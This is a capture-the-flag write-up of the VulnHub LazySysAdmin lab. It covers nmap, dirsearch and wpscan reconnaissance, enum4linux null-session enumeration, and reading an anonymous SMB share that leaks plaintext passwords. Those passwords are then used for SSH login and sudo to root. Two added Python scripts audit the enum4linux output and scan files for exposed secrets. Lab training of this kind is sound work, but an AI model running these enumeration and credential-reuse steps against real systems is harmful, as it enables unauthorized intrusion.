NEKO

vulnhub-Lazysysadmin

2018/07/26

Host discovery

nmap -sP 10.10.10.0/24

Target IP found: 10.10.10.188

Service scan

nmap -sS -Pn -T4 10.10.10.188

22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc

Port 445 runs SMB, port 6667 runs an IRC service, and port 139 runs the NBT (NetBIOS session) service.

Directory brute-forcing

Starting from port 80

python3 dirsearch.py -u 10.10.10.188 -e '*'

The wordlist needs some tuning.

Found phpmyadmin and wordpress.
No useful information in the remaining directories.

Gathering WordPress information

root@neko:~# wpscan http://10.10.10.188/wordpress
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.10.10.188/wordpress/
[+] Started: Fri Jul 27 11:41:54 2018

[!] The WordPress 'http://10.10.10.188/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://10.10.10.188/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://10.10.10.188/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://10.10.10.188/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.188/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.188/wordpress/wp-includes/

[+] WordPress version 4.8.7 (Released on 2018-07-05) identified from links opml, meta generator

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
| Last updated: 2018-05-17T00:00:00.000Z
| Location: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 2.0
| Style URL: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Fri Jul 27 11:41:58 2018
[+] Requests Done: 356
[+] Memory used: 40.523 MB
[+] Elapsed time: 00:00:04

The site owner's name was also found on the home page: togie

Exploring the SMB service

enum4linux: on Windows there was once a third-party information-enumeration tool, enum.exe, which uses the SMB protocol to enumerate Windows systems and Samba services and thereby obtain a large amount of important information about the target; its results may include sensitive data such as user accounts, group accounts, shared directories and the password policy. enum4linux is a Linux reimplementation of it that is fully compatible with all of enum.exe's features. Against poorly protected SMB/Samba services, enum4linux can enumerate important information directly and even help reveal potential vulnerabilities. To make full use of it, the user needs some familiarity with the NetBIOS and SMB protocols.

root@neko:~# enum4linux 10.10.10.188
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 27 11:47:13 2018

==========================
| Target Information |
==========================
Target ........... 10.10.10.188
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 10.10.10.188 |
====================================================
[+] Got domain/workgroup name: WORKGROUP

============================================
| Nbtstat Information for 10.10.10.188 |
============================================
Looking up status of 10.10.10.188
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 10.10.10.188 |
=====================================
[+] Server 10.10.10.188 allows sessions using username '', password ''

===========================================
| Getting domain SID for 10.10.10.188 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
| OS information on 10.10.10.188 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.188 from smbclient:
[+] Got OS info for 10.10.10.188 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

=============================
| Users on 10.10.10.188 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

=========================================
| Share Enumeration on 10.10.10.188 |
=========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 10.10.10.188
//10.10.10.188/print$ Mapping: DENIED, Listing: N/A
//10.10.10.188/share$ Mapping: OK, Listing: OK
//10.10.10.188/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

====================================================
| Password Policy Information for 10.10.10.188 |
====================================================


[+] Attaching to 10.10.10.188 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


==============================
| Groups on 10.10.10.188 |
==============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 10.10.10.188 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-502 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-503 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-504 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-505 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-506 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-507 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-508 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-509 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-510 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-511 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-515 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-516 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-517 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-518 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-519 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-520 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-521 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-522 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-523 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-524 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-525 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-526 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-527 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-528 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-529 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-530 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-531 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-532 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-533 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-534 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-535 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-536 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-537 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-538 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-539 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-540 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-541 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-542 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-543 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-544 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-545 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-546 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-547 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-548 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-549 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-550 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1000 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1001 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1002 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1003 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1004 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1005 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1006 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1007 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1008 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1009 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1010 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1011 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1012 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1013 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1014 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1015 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1016 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1017 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1018 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1019 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1020 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1021 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1022 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1023 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1024 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1025 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1026 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1027 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1028 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1029 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1030 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1031 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1032 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1033 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1034 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1035 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1036 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1037 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1038 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1039 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1040 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1041 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1042 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1043 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1044 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1045 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1046 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1047 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1048 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1049 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)

=============================================
| Getting printer info for 10.10.10.188 |
=============================================
No printers returned.


enum4linux complete on Fri Jul 27 11:47:47 2018
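As an added example (not code from this post or from enum4linux), the following Python script turns an enum4linux report like the one above into a list of misconfiguration findings a defender would triage: null sessions, anonymously mappable shares, a weak password policy and accounts disclosed by RID cycling. The sample report is a constructed excerpt of the output shown above, and the severity labels and the 12-character minimum length are this example's own assumptions.

```python
"""Audit an enum4linux report for SMB misconfigurations (added example)."""
import re

# Constructed sample: excerpts of the enum4linux output shown above.
SAMPLE_REPORT = """\
[+] Server 10.10.10.188 allows sessions using username '', password ''
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
[+] Attempting to map shares on 10.10.10.188
//10.10.10.188/print$ Mapping: DENIED, Listing: N/A
//10.10.10.188/share$ Mapping: OK, Listing: OK
//10.10.10.188/IPC$ [E] Can't understand response:
[+] Minimum password length: 5
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
S-1-22-1-1000 Unix User\\togie (Local User)
"""

# One regex per line shape enum4linux prints for the checks we care about.
NULL_SESSION = re.compile(r"allows sessions using username '', password ''")
SHARE_MAP = re.compile(r"^//[^/]+/(?P<share>\S+)\s+Mapping: (?P<map>\w+), Listing: (?P<list>\w+)")
MIN_PW_LEN = re.compile(r"Minimum password length: (?P<n>\d+)")
COMPLEXITY = re.compile(r"Password Complexity Flags: (?P<flags>\d+)")
LOCKOUT = re.compile(r"Account Lockout Threshold: (?P<n>\S+)")
UNIX_USER = re.compile(r"^S-1-22-1-\d+ Unix User\\(?P<user>\S+) \(Local User\)")


def audit_enum4linux(report: str, min_len: int = 12) -> list:
    """Return one finding per misconfiguration visible in the report text."""
    findings = []

    def add(severity, check, detail):
        findings.append({"severity": severity, "check": check, "detail": detail})

    for raw in report.splitlines():
        line = raw.strip()
        if NULL_SESSION.search(line):
            add("high", "null_session", "anonymous SMB session accepted")
        if (m := SHARE_MAP.match(line)) and m["map"] == "OK" and not m["share"].startswith("IPC"):
            add("high", "anonymous_share", f"{m['share']} mappable without credentials (listing: {m['list']})")
        if (m := MIN_PW_LEN.search(line)) and int(m["n"]) < min_len:
            add("medium", "weak_min_length", f"minimum password length {m['n']} < {min_len}")
        if (m := COMPLEXITY.search(line)) and set(m["flags"]) == {"0"}:
            add("medium", "no_complexity", "password complexity disabled")
        if (m := LOCKOUT.search(line)) and m["n"] == "None":
            add("medium", "no_lockout", "account lockout threshold not set")
        if m := UNIX_USER.match(line):
            add("low", "user_disclosed", f"local account '{m['user']}' enumerable via RID cycling")
    return findings


def worst_severity(findings: list) -> str:
    """Collapse the findings to the highest severity present ('none' if clean)."""
    order = ["none", "low", "medium", "high"]
    return max((f["severity"] for f in findings), key=order.index, default="none")


if __name__ == "__main__":
    for f in audit_enum4linux(SAMPLE_REPORT):
        print(f"[{f['severity']:6}] {f['check']}: {f['detail']}")
    print("overall:", worst_severity(audit_enum4linux(SAMPLE_REPORT)))
```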

Findings

Server 10.10.10.188 allows sessions using username '', password ''
...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
...
//10.10.10.188/print$ Mapping: DENIED, Listing: N/A
//10.10.10.188/share$ Mapping: OK, Listing: OK
//10.10.10.188/IPC$ [E] Can't understand response:
...

We can see that a share named share$ is available.
We can connect to the SMB server directly:

root@neko:~# smbclient //10.10.10.188/share$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Fri Jul 27 19:37:31 2018
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017

3029776 blocks of size 1024. 1455000 blocks available

Or, on Windows, map it to drive letter K:

C:\Users\kuraraneko>net use k: \\10.10.10.188\share$
命令成功完成。

Found in deets.txt:

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Found in wp-config:

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');
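As an added example (not code from this post or from WordPress), the Python scanner below walks a mounted share like share$ and reports where plaintext secrets of the two kinds found here sit, a wp-config.php define() holding DB_PASSWORD and a bare "Password ..." note like deets.txt, recording file, line and length but never the secret itself. The sample files are constructed in a temporary directory from the contents shown above; the size limit and the list of WordPress constants checked are this example's assumptions.

```python
"""Report plaintext credentials in files exposed on a share (added example)."""
import re
import tempfile
from pathlib import Path

# Line shapes of the two leaks found on share$: a WordPress wp-config.php
# define() holding a secret, and a bare "Password <value>" note like deets.txt.
PATTERNS = {
    "wp_config_define": re.compile(
        r"""define\(\s*['"](?P<name>DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)['"]"""
        r"""\s*,\s*['"](?P<value>[^'"]+)['"]\s*\)"""),
    "password_note": re.compile(r"(?i)^\s*password\s*[:=]?\s*(?P<value>\S+)\s*$"),
}


def scan_share(root: Path, max_bytes: int = 1_000_000) -> list:
    """Walk a mounted share and report where secrets sit, without echoing them."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.stat().st_size > max_bytes:
            continue  # skip directories and anything too large to be a config or note
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for kind, pattern in PATTERNS.items():
                m = pattern.search(line)
                if m:
                    findings.append({
                        "file": path.relative_to(root).as_posix(),
                        "line": lineno,
                        "kind": kind,
                        "field": m.groupdict().get("name") or "password",
                        "value_len": len(m["value"]),  # length only, never the secret
                    })
    return findings


def build_sample_share(root: Path) -> None:
    """Constructed sample mirroring the relevant files from share$ above."""
    (root / "deets.txt").write_text(
        "CBF Remembering all these passwords.\n\n"
        "Remember to remove this file and update your password after we push out the server.\n\n"
        "Password 12345\n")
    (root / "wordpress").mkdir()
    (root / "wordpress" / "wp-config.php").write_text(
        "<?php\ndefine('DB_NAME', 'wordpress');\n"
        "define('DB_USER', 'Admin');\n"
        "define('DB_PASSWORD', 'TogieMYSQL12345^^');\n"
        "define('DB_HOST', 'localhost');\n")
    (root / "index.html").write_text("<html><body>no secrets here</body></html>\n")


def demo() -> list:
    """Run the scanner over the constructed share and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_share(root)
        return scan_share(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']} {f['kind']} ({f['field']}, {f['value_len']} chars)")
```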

getshell

I originally wanted to get a shell through phpmyadmin, but ran into all sorts of permission restrictions and found no way in.
Logged in over SSH with the username togie and password 12345 found earlier:

root@neko:~# ssh togie@10.10.10.188
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

togie@10.10.10.188's password:
Permission denied, please try again.
togie@10.10.10.188's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Fri Jul 27 19:53:22 AEST 2018

System load: 0.24 Memory usage: 8% Processes: 192
Usage of /: 46.2% of 2.89GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

Got root with sudo su.
The flag was finally found in /root/proof.txt.

Finally, don't forget to close the connection:

C:\Users\kuraraneko>net use k: /del

This noob cat deleted the VM without closing the connection and ended up having to go into the registry to get rid of the drive icon (:з」∠)
Reference: http://sec-redclub.com/archives/838/

Original author: n3k0

Published: July 26th 2018, 6:19:46